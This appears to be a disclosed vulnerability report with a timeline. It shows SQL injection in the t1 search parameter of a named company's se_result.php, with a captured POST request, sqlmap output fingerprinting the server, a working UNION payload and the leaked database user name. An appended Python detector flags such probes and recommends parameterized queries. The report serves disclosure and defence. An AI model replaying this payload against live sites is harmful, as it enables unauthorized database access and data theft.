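2015-12-14: Details reported to the vendor; awaiting vendor handling
2015-12-14: Vendor has confirmed; details disclosed to the vendor only
2015-12-24: Details disclosed to core white hats and experts in related fields
2016-01-03: Details disclosed to regular white hats
2016-01-13: Details disclosed to intern white hats
2016-01-25: Details disclosed to the public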
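The submission just now did not include the address. URL: http://www.sunyard.com/se_result.php (the search function returns an error when a single quote is entered)
Captured request: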
POST /se_result.php HTTP/1.1
Host: www.sunyard.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.sunyard.com/se_result.php
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 4

t1=1
The t1 parameter is injectable:
[13:53:17] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.14
back-end DBMS: Microsoft SQL Server 2005
[13:53:17] [INFO] fetching database names
available databases [1]:
[*] master

---
Place: POST
Parameter: t1
    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: t1=1' UNION ALL SELECT NULL, CHAR(58)+CHAR(119)+CHAR(112)+CHAR(107)+CHAR(58)+CHAR(77)+CHAR(106)+CHAR(89)+CHAR(83)+CHAR(85)+CHAR(65)+CHAR(81)+CHAR(81)+CHAR(118)+CHAR(108)+CHAR(58)+CHAR(97)+CHAR(106)+CHAR(106)+CHAR(58), NULL, NULL, NULL, NULL, NULL-- AND 'endw'='endw
---
[13:57:42] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.14
back-end DBMS: Microsoft SQL Server 2005
[13:57:42] [INFO] fetching current user
current user: 'xyd'
Severity: High
Vulnerability Rank: 20
Confirmed at: 2015-12-14 15:17
Thank you very much for your help and support!
None yet
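Added example, not part of the original report: a Python check a defender could run over captured form bodies to flag the kind of UNION probe shown in the tool output above. It decodes the CHAR() chain into the marker string it builds and counts the injected columns. The function names and finding fields are assumptions made for this illustration, and the sample bodies are constructed from the two t1 values on this page.

```python
import re
from urllib.parse import parse_qsl, urlencode

UNION_SELECT = re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)
CHAR_CHAIN = re.compile(r"CHAR\(\d{1,3}\)(?:\s*\+\s*CHAR\(\d{1,3}\))+", re.I)

def decode_char_chain(chain):
    """Return the string that a CHAR(n)+CHAR(n)+... expression builds."""
    return "".join(chr(int(n)) for n in re.findall(r"\d+", chain))

def count_columns(select_list):
    """Count top-level, comma-separated items (commas inside calls are ignored)."""
    depth, columns = 0, 1
    for ch in select_list:
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
        elif ch == "," and depth == 0:
            columns += 1
    return columns

def inspect_form_body(body):
    """Return one finding per form field whose decoded value carries a UNION probe."""
    findings = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        hit = UNION_SELECT.search(value)
        if not hit:
            continue
        select_list = value[hit.end():].split("--", 1)[0]  # drop the trailing comment
        findings.append({
            "parameter": name,
            "quote_before_union": "'" in value[:hit.start()],
            "columns": count_columns(select_list),
            "markers": [decode_char_chain(c) for c in CHAR_CHAIN.findall(select_list)],
        })
    return findings

# Constructed sample inputs: the two t1 values shown on this page, form-encoded
# the way they would travel in the POST body ('+' becomes %2B, space becomes '+').
CODES = [58, 119, 112, 107, 58, 77, 106, 89, 83, 85, 65, 81, 81, 118, 108, 58, 97, 106, 106, 58]
PROBE_VALUE = ("1' UNION ALL SELECT NULL, " + "+".join(f"CHAR({c})" for c in CODES)
               + ", NULL, NULL, NULL, NULL, NULL-- AND 'endw'='endw")
PROBE_BODY = urlencode({"t1": PROBE_VALUE})
BENIGN_BODY = "t1=1"

if __name__ == "__main__":
    print(inspect_form_body(BENIGN_BODY))
    print(inspect_form_body(PROBE_BODY))
```

A match is a triage signal only: the remedy for the t1 parameter is to bind the search term as a query parameter in se_result.php rather than concatenating it into the SQL string.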